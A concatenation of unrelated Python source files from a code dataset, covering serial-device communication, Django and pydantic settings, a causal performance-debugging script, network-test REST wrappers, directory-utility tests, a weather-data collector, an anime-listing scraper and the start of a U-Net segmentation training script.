receivedData = comport.readline().strip().decode("utf-8")
if len(receivedData) > 0:
if receivedData[0] == "!":
self.intQueue.put(receivedData)
elif receivedData[0] == "-":
self.rxdQueue.put(receivedData)
if not self.txdQueue.empty():
serialCommand = self.txdQueue.get() + "\n"
comport.write(serialCommand.encode("utf-8"))
except Exception as e: # pylint: disable=broad-except
self.stopper.set()
self.exception = e
# print('Comm Error!')
comport.close()
def get_exception(self):
return self.exception
def startUartBridge(self):
self.inBridgeMode = True
def stopUartBridge(self):
self.inBridgeMode = False
class SignalHandler:
"""
The object that will handle signals and stop the worker threads.
"""
#: The stop event that's shared by this handler and threads.
stopper = None
#: The pool of worker threads
workers = None
def __init__(self, stopper, manager):
self.stopper = stopper
self.manager = manager
def __call__(self, signum, frame):
"""
This will be called by the python signal module
https://docs.python.org/3/library/signal.html#signal.signal
"""
self.stopper.set()
self.manager.join()
sys.exit(0)
def sendStop(self):
self.stopper.set()
self.manager.join()
class binhoException(Exception):
pass
class oneWireCmd(enum.Enum):
"""Enum for exchangeBytes1WIRE"""
NONE = "NONE"
SELECT = "SELECT"
SKIP = "SKIP"
class binhoComms:
def __init__(self, serialPort):
self.serialPort = serialPort
self.handler = None
self.manager = None
self.interrupts = None
self._stopper = None
self._txdQueue = None
self._rxdQueue = None
self._intQueue = None
self._debug = os.getenv("BINHO_NOVA_DEBUG")
# Destructor
def __del__(self):
if self.handler is not None:
try:
self.handler.sendStop()
except BaseException:
pass
# Private functions
def _checkInterrupts(self):
while not self._intQueue.empty():
self.interrupts.add(self._intQueue.get())
# Public functions
def sendCommand(self, command):
if self._debug is not None:
print(command)
self._txdQueue.put(command, timeout=SERIAL_TIMEOUT)
def readResponse(self):
result = "[ERROR]"
if self.manager.is_alive():
if not self.manager.get_exception():
try:
result = self._rxdQueue.get(timeout=SERIAL_TIMEOUT)
except queue.Empty:
# print('Connection with Device Lost!')
self.handler.sendStop()
else:
# print('Connection with Device Lost!')
self.handler.sendStop()
if self._debug is not None:
print(result)
return result
@classmethod
def checkDeviceSuccess(cls, ret_str):
if ret_str == "-OK":
return True
if ret_str == "-NG":
return False
raise binhoException(f"Invalid command response: {ret_str}")
# Communication Management
def start(self):
self.handler = None
self.manager = None
self.interrupts = None
self._stopper = None
self._txdQueue = None
self._rxdQueue = None
self._intQueue = None
comport = serial.Serial(self.serialPort, baudrate=1000000, timeout=0.025, write_timeout=0.05)
comport.close()
self.interrupts = set()
self._stopper = threading.Event()
self._txdQueue = queue.Queue()
self._rxdQueue = queue.Queue()
self._intQueue = queue.Queue()
# we need to keep track of the workers but not start them yet
# workers = [StatusChecker(url_queue, result_queue, stopper) for i in range(num_workers)]
self.manager = SerialPortManager(
self.serialPort, self._txdQueue, self._rxdQueue, self._intQueue, self._stopper,
)
# create our signal handler and connect it
self.handler = SignalHandler(self._stopper, self.manager)
signal.signal(signal.SIGINT, self.handler)
# start the threads!
self.manager.daemon = True
self.manager.start()
def open(self):
self.interrupts.clear()
self.manager.start()
def isConnected(self):
return self.manager.is_alive()
def isCommError(self):
e = self.manager.get_exception()
if e:
return True
return False
def close(self):
if self.handler:
self.handler.sendStop()
def interruptCount(self):
self._checkInterrupts()
return len(self.interrupts)
def interruptCheck(self, interrupt):
self._checkInterrupts()
if interrupt in self.interrupts:
return True
return False
def interruptClear(self, interrupt):
self.interrupts.discard(interrupt)
def interruptClearAll(self):
self.interrupts.clear()
def getInterrupts(self):
self._checkInterrupts()
return self.interrupts.copy()
# BUFFER COMMANDS
def clearBuffer(self, bufferIndex):
self.sendCommand("BUF" + str(bufferIndex) + " CLEAR")
result = self.readResponse()
return result
def addByteToBuffer(self, bufferIndex, value):
self.sendCommand("BUF" + str(bufferIndex) + " ADD " + str(value))
result = self.readResponse()
return result
def readBuffer(self, bufferIndex, numBytes):
self.sendCommand("BUF" + str(bufferIndex) + " READ " + str(numBytes))
result = self.readResponse()
return result
def writeToBuffer(self, bufferIndex, startIndex, data):
bufferData = ""
for x in data:
bufferData += " " + str(x)
self.sendCommand("BUF" + str(bufferIndex) + " WRITE " + str(startIndex) + bufferData)
result = self.readResponse()
return result
# UART COMMANDS
def setBaudRateUART(self, uartIndex, baud):
self.sendCommand("UART" + str(uartIndex) + " BAUD " + str(baud))
result = self.readResponse()
return result
def getBaudRateUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " BAUD ?")
result = self.readResponse()
return result
def setDataBitsUART(self, uartIndex, databits):
self.sendCommand("UART" + str(uartIndex) + " DATABITS " + str(databits))
result = self.readResponse()
return result
def getDataBitsUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " DATABITS ?")
result = self.readResponse()
return result
def setParityUART(self, uartIndex, parity):
self.sendCommand("UART" + str(uartIndex) + " PARITY " + str(parity))
result = self.readResponse()
return result
def getParityUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " PARITY ?")
result = self.readResponse()
return result
def setStopBitsUART(self, uartIndex, stopbits):
self.sendCommand("UART" + str(uartIndex) + " STOPBITS " + str(stopbits))
result = self.readResponse()
return result
def getStopBitsUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " STOPBITS ?")
result = self.readResponse()
return result
def setEscapeSequenceUART(self, uartIndex, escape):
self.sendCommand("UART" + str(uartIndex) + " ESC " + escape)
result = self.readResponse()
return result
def getEscapeSequenceUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " ESC ?")
result = self.readResponse()
return result
def beginBridgeUART(self, uartIndex):
self.sendCommand("UART" + str(uartIndex) + " BEGIN")
result = self.readResponse()
self.manager.startUartBridge()
return result
def stopBridgeUART(self, sequence):
self.manager.stopUartBridge()
self._txdQueue.put(sequence, timeout=SERIAL_TIMEOUT)
result = self.readResponse()
return result
def writeBridgeUART(self, data):
self._txdQueue.put(data, timeout=SERIAL_TIMEOUT)
def readBridgeUART(self, timeout=SERIAL_TIMEOUT):
# Don't raise an exception if there is nothing to read, the other side may hae nothing to say
# But don't wait forever
return self._rxdQueue.get(timeout=timeout)
# SWI COMMANDS
def beginSWI(self, swiIndex, pin, pullup):
if not pullup:
self.sendCommand("SWI" + str(swiIndex) + " BEGIN " + str(pin))
else:
self.sendCommand("SWI" + str(swiIndex) + " BEGIN " + str(pin) + " PULL")
result = self.readResponse()
return result
def sendTokenSWI(self, swiIndex, token):
self.sendCommand("SWI" + str(swiIndex) + " TOKEN " + str(token))
result = self.readResponse()
return result
def sendFlagSWI(self, swiIndex, flag):
self.sendCommand("SWI" + str(swiIndex) + " FLAG " + str(flag))
result = self.readResponse()
return result
def sendCommandFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG COMMAND")
result = self.readResponse()
return result
def sendTransmitFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG TRANSMIT")
result = self.readResponse()
return result
def sendIdleFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG IDLE")
result = self.readResponse()
return result
def sendSleepFlagSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " FLAG SLEEP")
result = self.readResponse()
return result
def transmitByteSWI(self, swiIndex, data):
self.sendCommand("SWI" + str(swiIndex) + " TX " + str(data))
result = self.readResponse()
return result
def receiveBytesSWI(self, swiIndex, count):
self.sendCommand("SWI" + str(swiIndex) + " RX " + str(count))
result = self.readResponse()
return result
def setPacketOpCodeSWI(self, swiIndex, opCode):
self.sendCommand("SWI" + str(swiIndex) + " PACKET OPCODE " + str(opCode))
result = self.readResponse()
return result
def setPacketParam1SWI(self, swiIndex, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET PARAM1 " + str(value))
result = self.readResponse()
return result
def setPacketParam2SWI(self, swiIndex, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET PARAM2 " + str(value))
result = self.readResponse()
return result
def setPacketDataSWI(self, swiIndex, index, value):
self.sendCommand("SWI" + str(swiIndex) + " PACKET DATA " + str(index) + " " + str(value))
result = self.readResponse()
return result
def setPacketDataFromBufferSWI(self, swiIndex, byteCount, bufferName):
self.sendCommand("SWI" + str(swiIndex) + " PACKET DATA " + str(byteCount) + " " + str(bufferName))
result = self.readResponse()
return result
def sendPacketSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " PACKET SEND")
result = self.readResponse()
return result
def clearPacketSWI(self, swiIndex):
self.sendCommand("SWI" + str(swiIndex) + " PACKET CLEAR")
result = self.readResponse()
return result
def _to_hex_string(byte_array):
"""Convert a byte array to a hex string."""
hex_generator = ("{:02x}".format(x) for x in byte_array)
return "".join(hex_generator)
| StarcoderdataPython |
8430 | <reponame>gene1wood/django-product-details<filename>product_details/utils.py
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from product_details import settings_defaults
def settings_fallback(key):
"""Grab user-defined settings, or fall back to default."""
try:
return getattr(settings, key)
except (AttributeError, ImportError, ImproperlyConfigured):
return getattr(settings_defaults, key)
def get_django_cache(cache_name):
try:
from django.core.cache import caches # django 1.7+
return caches[cache_name]
except ImportError:
from django.core.cache import get_cache
return get_cache(cache_name)
except ImproperlyConfigured:
# dance to get around not-setup-django at import time
return {}
| StarcoderdataPython |
3315415 | <reponame>dougli1sqrd/agr_literature_service<filename>non_pr_tests/pydantic/config.py
from typing import Set
import inspect
from pydantic import (
BaseModel,
BaseSettings,
Field
)
from os import environ
from literature.schemas import EnvStateSchema
class SubModel(BaseModel):
foo = 'bar'
apple = 1
class Settings(BaseSettings):
api_key: str = Field(..., env='my_api_key')
FROM_ENV_FILE: str
OVERRIDE: str = Field(..., env='OVERRIDE')
# to override domains:
# export my_prefix_domains='["foo.com", "bar.com"]'
domains: Set[str] = set()
# to override more_settings:
# export my_prefix_more_settings='{"foo": "x", "apple": 1}'
more_settings: SubModel = SubModel()
class Config:
# env_prefix = 'my_prefix_' # defaults to no prefix, i.e. ""
# env_file = ".env"
env_file = environ.get('env_file', '.env')
print(env_file)
print(inspect.getfile(EnvStateSchema))
print(Settings().dict())
| StarcoderdataPython |
3355029 | import os
import sys
import json
import yaml
import pandas as pd
from ananke.graphs import ADMG
from networkx import DiGraph
from optparse import OptionParser
sys.path.append(os.getcwd())
sys.path.append('/root')
from src.causal_model import CausalModel
from src.generate_params import GenerateParams
def config_option_parser():
"""This function is used to configure option parser
@returns:
options: option parser handle"""
usage = """USAGE: %python3 run_unicorn_debug.py -o [objectives] -d [init_data] -s [software] -k [hardware] -m [mode] -i [bug_index]
"""
parser = OptionParser(usage=usage)
parser.add_option('-o', '--objective', dest='obj',
default=[], nargs=1, type='choice',
choices=('inference_time', 'total_energy_consumption', 'total_temp'), action='append', help="objective type")
parser.add_option('-s', "--software", action="store",
type="string", dest="software", help="software")
parser.add_option('-k', "--hardware", action="store",
type="string", dest="hardware", help="hardware")
parser.add_option('-m', "--mode", action="store",
type="string", dest="mode", help="mode")
parser.add_option('-i', "--bug_index", action="store",
type="string", dest="bug_index", help="bug_index")
(options, args) = parser.parse_args()
return options
def run_unicorn_loop(CM, df,
tabu_edges, columns, options,
NUM_PATHS):
"""This function is used to run unicorn in a loop"""
# NOTEARS causal model hyperparmas
#_, notears_edges = CM.learn_entropy(df, tabu_edges, 0.75)
# get bayesian network from DAG obtained
# bn = BayesianNetwork(sm)
fci_edges = CM.learn_fci(df, tabu_edges)
edges = []
# resolve notears_edges and fci_edges and update
di_edges, bi_edges = CM.resolve_edges(edges, fci_edges, columns,
tabu_edges, NUM_PATHS, options.obj)
# construct mixed graph ADMG
G = ADMG(columns, di_edges=di_edges, bi_edges=bi_edges)
return G, di_edges, bi_edges
if __name__ == "__main__":
query = 0.8
NUM_PATHS = 25
options = config_option_parser()
# Initialization
with open(os.path.join(os.getcwd(), "etc/config.yml")) as file:
cfg = yaml.load(file, Loader=yaml.FullLoader)
# nodes for causal graph
soft_columns = cfg["software_columns"][options.software]
hw_columns = cfg["hardware_columns"][options.hardware]
kernel_columns = cfg["kernel_columns"]
perf_columns = cfg["perf_columns"]
obj_columns = options.obj
columns = soft_columns + hw_columns + kernel_columns + perf_columns + obj_columns
conf_opt = soft_columns + hw_columns + kernel_columns
if len(options.obj) > 1:
init_dir = os.path.join(os.getcwd(), cfg["init_dir"], "multi",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + "initial.csv")
bug_dir = os.path.join(os.getcwd(), cfg["bug_dir"], "multi", options.hardware,
options.software, options.hardware + "_" + options.software + "_" + "multi.csv")
with open(os.path.join(os.getcwd(), cfg["debug_dir"], "multi", options.hardware,
options.software, "measurement.json")) as mfl:
m = json.load(mfl)
else:
init_dir = os.path.join(os.getcwd(), cfg["init_dir"], "single",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + "initial.csv")
bug_dir = os.path.join(os.getcwd(), cfg["bug_dir"], "single",
options.hardware, options.software, options.hardware + "_" + options.software + "_" + options.obj[0] + ".csv")
with open(os.path.join(os.getcwd(), cfg["debug_dir"], "single", options.hardware,
options.software, "measurement.json")) as mfl:
m = json.load(mfl)
# get init data
df = pd.read_csv(init_dir)
df = df[columns]
# get bug data
bug_df = pd.read_csv(bug_dir)
# initialize causal model object
CM = CausalModel(columns)
g = DiGraph()
g.add_nodes_from(columns)
# edge constraints
tabu_edges = CM.get_tabu_edges(columns, conf_opt, options.obj)
G, di_edges, bi_edges = run_unicorn_loop(CM, df,
tabu_edges, columns, options,
NUM_PATHS)
g.add_edges_from(di_edges + bi_edges)
var_types = {}
for col in columns:
var_types[col] = "c"
# Get Bug and update df
bug_exists = True
if options.bug_index:
bug_df = bug_df.iloc[int(options.bug_index):int(options.bug_index) + 1]
result_columns = conf_opt + obj_columns
measurement_dir = os.path.join(os.getcwd(),"data","measurement","output","debug_exp.csv")
for bug_id in range(len(bug_df)):
result_df = pd.DataFrame(columns=result_columns)
if options.bug_index:
bug = bug_df.loc[int(options.bug_index)]
bug_id = int(options.bug_index)
else:
bug = bug_df.loc[bug_id]
# update df after a bug is resolved
df = pd.read_csv(init_dir)
df = df[columns]
# initialize causal model object
CM = CausalModel(columns)
g = DiGraph()
g.add_nodes_from(columns)
# edge constraints
tabu_edges = CM.get_tabu_edges(columns, conf_opt, options.obj)
G, di_edges, bi_edges = run_unicorn_loop(CM, df,
tabu_edges, columns, options,
NUM_PATHS)
g.add_edges_from(di_edges + bi_edges)
bug_exists = True
print("--------------------------------------------------")
print("BUG ID: ", bug_id)
print("--------------------------------------------------")
it = 0
previous_config = bug[conf_opt].copy()
while bug_exists:
# identify causal paths
paths = CM.get_causal_paths(columns, di_edges, bi_edges,
options.obj)
# compute causal paths
if len(options.obj) < 2:
# single objective faults
for key, val in paths.items():
if len(paths[key]) > NUM_PATHS:
paths = CM.compute_path_causal_effect(df, paths[key], G,
NUM_PATHS)
else:
paths = paths[options.obj[0]]
# compute individual treatment effect in a path
print(paths)
config = CM.compute_individual_treatment_effect(df, paths, g,
query, options, bug[options.obj[0]],
previous_config, cfg, var_types)
else:
# multi objective faults
paths = paths[options.obj[0]]
# compute individual treatment effect in a path
config = CM.compute_individual_treatment_effect(df, paths, g,
query, options, bug[options.obj],
previous_config, cfg, var_types)
# perform intervention. This updates the init_data
if config is not None:
if options.mode == "offline":
curm = m[options.hardware][options.software][options.obj[0]][str(
bug_id)][str(it)]["measurement"]
if curm < (1 - query) * bug[options.obj[0]]:
bug_exists = False
print("--------------------------------------------------")
print("+++++++++++++++Recommended Fix++++++++++++++++++++")
print(config)
print("Unicorn Fix Value", curm)
print("Number of Samples Required", str(it))
print("--------------------------------------------------")
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print(bug[conf_opt])
print("Bug Objective Value", int(bug[options.obj[0]]))
print("--------------------------------------------------")
config = config.tolist()
config.extend([curm])
config = pd.DataFrame([config])
config.columns = result_columns
result_df = pd.concat([result_df, config], axis=0)
result_df = result_df[result_columns]
result_df["bug_id"] = bug_id
result_df["method"] = "Unicorn"
result_df["num_samples"]=it
result_df["gain"]= ((bug[options.obj[0]]-curm)/bug[options.obj[0]])*100
if options.bug_index is None:
if bug_id == 0:
result_df.to_csv(measurement_dir,index=False)
else:
result_df.to_csv(measurement_dir,index=False, header=False,mode="a")
else:
curc = m[options.hardware][options.software][options.obj[0]][str(
bug_id)][str(it)]["conf"]
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print("Recommended Config Objective Value", curm)
print("--------------------------------------------------")
it += 1
config = config.tolist()
config.extend(curc)
config.extend([curm])
config = pd.DataFrame([config])
config.columns = columns
df = pd.concat([df, config], axis=0)
df = df[columns]
# previous_config
previous_config = config.squeeze()[conf_opt]
# update initial
run_unicorn_loop(CM, df, tabu_edges,
columns, options, NUM_PATHS)
elif options.mode == "online":
gprm = GenerateParams(cfg, options, config,
bug_id, it, "unicorn")
curc, curm = gprm.run_unicorn_experiment()
if curm < (1 - query) * bug[options.obj[0]]:
bug_exists = False
print("--------------------------------------------------")
print("+++++++++++++++Recommended Fix++++++++++++++++++++")
print(config)
print("Unicorn Fix Value", curm)
print("Number of Samples Required", str(it))
print("--------------------------------------------------")
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print(bug[conf_opt])
print("Bug Objective Value", int(bug[options.obj[0]]))
print("--------------------------------------------------")
config = config.tolist()
config.extend([curm])
config = pd.DataFrame([config])
config.columns = result_columns
result_df = pd.concat([result_df, config], axis=0)
result_df = result_df[result_columns]
result_df["bug_id"] = bug_id
result_df["method"] = "Unicorn"
result_df["num_samples"]=it
result_df["gain"]= ((bug[options.obj[0]]-curm)/bug[options.obj[0]])*100
if options.bug_index is None:
if bug_id == 0:
result_df.to_csv(measurement_dir,index=False)
else:
result_df.to_csv(measurement_dir,index=False, header=False,mode="a")
else:
# run loop
print("--------------------------------------------------")
print("+++++++++++++++++++++Bug++++++++++++++++++++++++++")
print("Recommended Config Objective Value", curm)
print("--------------------------------------------------")
it += 1
config = config.tolist()
config.extend(curc)
config.extend([curm])
config = pd.DataFrame([config])
config.columns = columns
df = pd.concat([df, config], axis=0)
df = df[columns]
# previous_config
previous_config = config.squeeze()[conf_opt]
run_unicorn_loop(CM, df, tabu_edges,
columns, options, NUM_PATHS)
else:
print("[ERROR]: invalid mode")
else:
print("[ERROR]: no config recommended")
bug_exists = False
| StarcoderdataPython |
4458 | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class FixedClassifier(Base):
"""Specifies the packets to apply this profile to. If there are multiple patterns enabled, they are ANDed: each packet must match all packets in order to be impaired by this profile.
The FixedClassifier class encapsulates a list of fixedClassifier resources that are managed by the user.
A list of resources can be retrieved from the server using the FixedClassifier.find() method.
The list can be managed by using the FixedClassifier.add() and FixedClassifier.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'fixedClassifier'
_SDM_ATT_MAP = {
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(FixedClassifier, self).__init__(parent, list_op)
@property
def Pattern(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern.Pattern): An instance of the Pattern class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern import Pattern
if self._properties.get('Pattern', None) is not None:
return self._properties.get('Pattern')
else:
return Pattern(self)
def add(self):
"""Adds a new fixedClassifier resource on the server and adds it to the container.
Returns
-------
- self: This instance with all currently retrieved fixedClassifier resources using find and the newly added fixedClassifier resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained fixedClassifier resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self):
"""Finds and retrieves fixedClassifier resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve fixedClassifier resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all fixedClassifier resources from the server.
Returns
-------
- self: This instance with matching fixedClassifier resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of fixedClassifier data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the fixedClassifier resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| StarcoderdataPython |
1689501 | import os
import unittest
from vsi.tools.dir_util import (
find_file_in_path, is_subdir
)
from vsi.test.utils import TestCase
class DirTest(TestCase):
pass
class FindFileInPath(DirTest):
def test_path_argument(self):
# Empty lists
self.assertIsNone(find_file_in_path('foo.txt', ''))
self.assertIsNone(find_file_in_path('foo.txt', os.pathsep))
open(os.path.join(self.temp_dir.name, 'bar.txt',), 'wb').close()
# Just the dir
self.assertIsNone(find_file_in_path('foo.txt', self.temp_dir.name))
self.assertEqual(find_file_in_path('bar.txt', self.temp_dir.name),
os.path.join(self.temp_dir.name, 'bar.txt'))
# Multiple
self.assertEqual(find_file_in_path('bar.txt',
os.pathsep.join([
os.path.join(self.temp_dir.name, '1'),
os.path.join(self.temp_dir.name, '2'),
self.temp_dir.name,
os.path.join(self.temp_dir.name, '3')
])),
os.path.join(self.temp_dir.name, 'bar.txt'))
def test_env(self):
# Empty lists
with unittest.mock.patch.dict(os.environ, {'PATH': ""}):
self.assertIsNone(find_file_in_path('foo.txt'))
with unittest.mock.patch.dict(os.environ, {'PATH': os.pathsep}):
self.assertIsNone(find_file_in_path('foo.txt'))
open(os.path.join(self.temp_dir.name, 'bar.txt',), 'wb').close()
# Just the dir
with unittest.mock.patch.dict(os.environ, {'PATH': self.temp_dir.name}):
self.assertIsNone(find_file_in_path('foo.txt'))
self.assertEqual(find_file_in_path('bar.txt'),
os.path.join(self.temp_dir.name, 'bar.txt'))
# Multiple dirs
with unittest.mock.patch.dict(os.environ, {'PATH':
os.pathsep.join([
os.path.join(self.temp_dir.name, '1'),
os.path.join(self.temp_dir.name, '2'),
self.temp_dir.name,
os.path.join(self.temp_dir.name, '3')])}):
self.assertEqual(find_file_in_path('bar.txt'),
os.path.join(self.temp_dir.name, 'bar.txt'))
def test_is_subdir(self):
os.makedirs(os.path.join(self.temp_dir.name, 'a', 'b'))
os.makedirs(os.path.join(self.temp_dir.name, 'c', 'd'))
ans = is_subdir(os.path.join(self.temp_dir.name, 'a', 'b'),
self.temp_dir.name)
self.assertTrue(ans[0])
self.assertEqual(ans[1], os.path.join('a', 'b'))
ans = is_subdir(os.path.join(self.temp_dir.name, 'a', '.', 'b'),
self.temp_dir.name)
self.assertTrue(ans[0])
self.assertEqual(ans[1], os.path.join('a', 'b'))
ans = is_subdir(os.path.join(self.temp_dir.name, 'q', '..', 'a', 'b'),
self.temp_dir.name)
self.assertTrue(ans[0])
self.assertEqual(ans[1], os.path.join('a', 'b'))
ans = is_subdir(os.path.join(self.temp_dir.name, 'a'),
self.temp_dir.name)
self.assertTrue(ans[0])
self.assertEqual(ans[1], 'a')
ans = is_subdir(self.temp_dir.name,
self.temp_dir.name)
self.assertTrue(ans[0])
self.assertEqual(ans[1], ".")
ans = is_subdir(self.temp_dir.name,
os.path.join(self.temp_dir.name, 'a'))
self.assertFalse(ans[0])
self.assertEqual(ans[1], "..")
ans = is_subdir(os.path.join(self.temp_dir.name, 'a', 'b'),
os.path.join(self.temp_dir.name, 'c', 'd'))
self.assertFalse(ans[0])
self.assertEqual(ans[1], os.path.join('..', '..', 'a', 'b'))
if os.name != 'nt':
os.symlink(os.path.join(self.temp_dir.name, 'a', 'b'),
os.path.join(self.temp_dir.name, 'e'))
ans = is_subdir(os.path.join(self.temp_dir.name, 'e'),
os.path.join(self.temp_dir.name, 'a'))
self.assertTrue(ans[0])
self.assertEqual(ans[1], 'b')
ans = is_subdir(os.path.join(self.temp_dir.name, 'e'),
os.path.join(self.temp_dir.name, 'a'), False)
self.assertFalse(ans[0])
self.assertEqual(ans[1], os.path.join('..', 'e'))
| StarcoderdataPython |
3277144 | <reponame>GerdED/football<filename>experiment.py
trial...
| StarcoderdataPython |
4822772 | # Collect weather data for predetermined cities
# these are the corresponding cities with:
# - wind
# - solar
# - weather data exists on openweather api
import json
import requests
import pandas as pd
from time import time, sleep
from datetime import datetime
def writeData(title,timetext,data):
histfile = f'{title}_{timetext}.json'
with open(histfile,'a') as f:
json.dump(data, f, ensure_ascii=False, indent=2)
long_wait = 15*60 # 15 * 60 seconds
short_wait = 5 # 5 seconds
currentWeatherUrl='http://api.openweathermap.org/data/2.5/weather?q={}&APPID=asdfasdfasdgasdfasa_get_your_own_key'
forecastWeatherUrl='http://api.openweathermap.org/data/2.5/forecast?q={}&APPID=asdfasdfasdgasdfasa_get_your_own_key'
citiesUTF8 = ('Bremen','Chemnitz','Fichtelberg','Fürstenzell','Görlitz','Hamburg-Fuhlsbüttel','Hohenpeißenberg',\
'Konstanz','Lindenberg','Norderney','Potsdam','Rostock-Warnemünde','Saarbrücken-Ensheim',\
'Schleswig','Seehausen','Stuttgart (Schnarrenberg)','Trier-Petrisberg','Würzburg')
citiesASCII = ('Bremen','Chemnitz','Fichtelberg','Furstenzell','Gorlitz','Hamburg', 'Hohenpeissenberg',\
'Konstanz','Lindenberg','Norderney','Potsdam','Rostock' ,'Saarbrucken',\
'Schleswig','Seehausen','Stuttgart', 'Trier', 'Wuerzburg')
cities = citiesASCII
while True:
currData = {}
forecastData = {}
timetext = datetime.fromtimestamp(time()).strftime('%Y%m%d_%H%M%S')
for city in cities:
response = requests.get(currentWeatherUrl.format(city + ',DE'))
responseOut = {}
if response:
responseOut = response.json()
timenow = datetime.fromtimestamp(time()).strftime('%H:%M:%S')
print(f'Retrieved current weather for city={city} at {timenow}')
else:
print(f'Could not retreive current weather for city={city}')
currData[city] = responseOut
sleep(short_wait)
response = requests.get(forecastWeatherUrl.format(city + ',DE'))
responseOut = {}
if response:
responseOut = response.json()
timenow = datetime.fromtimestamp(time()).strftime('%H:%M:%S')
print(f'Retrieved forecast weather for city={city} at {timenow}')
else:
print(f'Could not retreive current weather for city={city}')
forecastData[city] = responseOut
sleep(short_wait)
# dump data
writeData('curr',timetext,currData)
writeData('fore',timetext,forecastData)
# wait till next
sleep(long_wait - 2*len(cities)*short_wait)
| StarcoderdataPython |
80732 | # pylint: disable=missing-docstring
from distutils.core import setup
setup(
name='noticast-iot-core',
version='0.1-dev',
packages=['noticast'],
install_requires=['AWSIoTPythonSDK', 'requests', 'raven'])
| StarcoderdataPython |
144935 | <reponame>chul0721/deliverables_presentation
from urllib.parse import quote
import requests
import json
import random
import time
boongi = input() # 분기를 입력받는 코드
encoding = quote(boongi)
header = {'laftel' : 'TeJava'}
laftel_API = 'https://laftel.net/api/search/v1/discover/?years=' + str(encoding)
next = ""
print ("==============================")
while(True):
response = requests.get(url = laftel_API, headers = header)
json = response.json()
results = json["results"]
for x in results:
print(x["name"])
next = json["next"]
if (next is not None):
laftel_API = next
else:
break
time.sleep(random.randint(1, 2))
print ("==============================") | StarcoderdataPython |
3389777 | <reponame>Wayne2Wang/Pytorch-minModel
import os
import time
from tqdm import tqdm
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision
import torchvision.datasets as datasets
from torch.utils.data import DataLoader
from torchvision import transforms
from torch.utils.tensorboard import SummaryWriter
from torchsummary import summary
from torchvision.transforms import InterpolationMode
from torch.nn.functional import one_hot
from unet import Unet
import checkpoint
PALETTE = [( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),( 0, 0, 0),
(111, 74, 0),( 81, 0, 81),(128, 64,128),(244, 35,232),(250,170,160),
(230,150,140),( 70, 70, 70),(102,102,156),(190,153,153),(180,165,180),
(150,100,100),(150,120, 90),(153,153,153),(153,153,153),(250,170, 30),
(220,220, 0),(107,142, 35),(152,251,152),( 70,130,180),(220, 20, 60),
(255, 0, 0),( 0, 0,142),( 0, 0, 70),( 0, 60,100),( 0, 0, 90),
( 0, 0,110),( 0, 80,100),( 0, 0,230),(119, 11, 32),( 0, 0,142)]
def save_img(img, title, dir):
plt.figure(figsize = (6,6))
plt.imshow(torch.permute(img,(1,2,0)))
plt.axis('off')
plt.title(title, y=-0.16, fontsize=10)
plt.savefig(os.path.join(dir, title+'.png'), bbox_inches='tight',pad_inches = 0)
plt.close()
def pred2color(pred, integer=False):
if not integer:
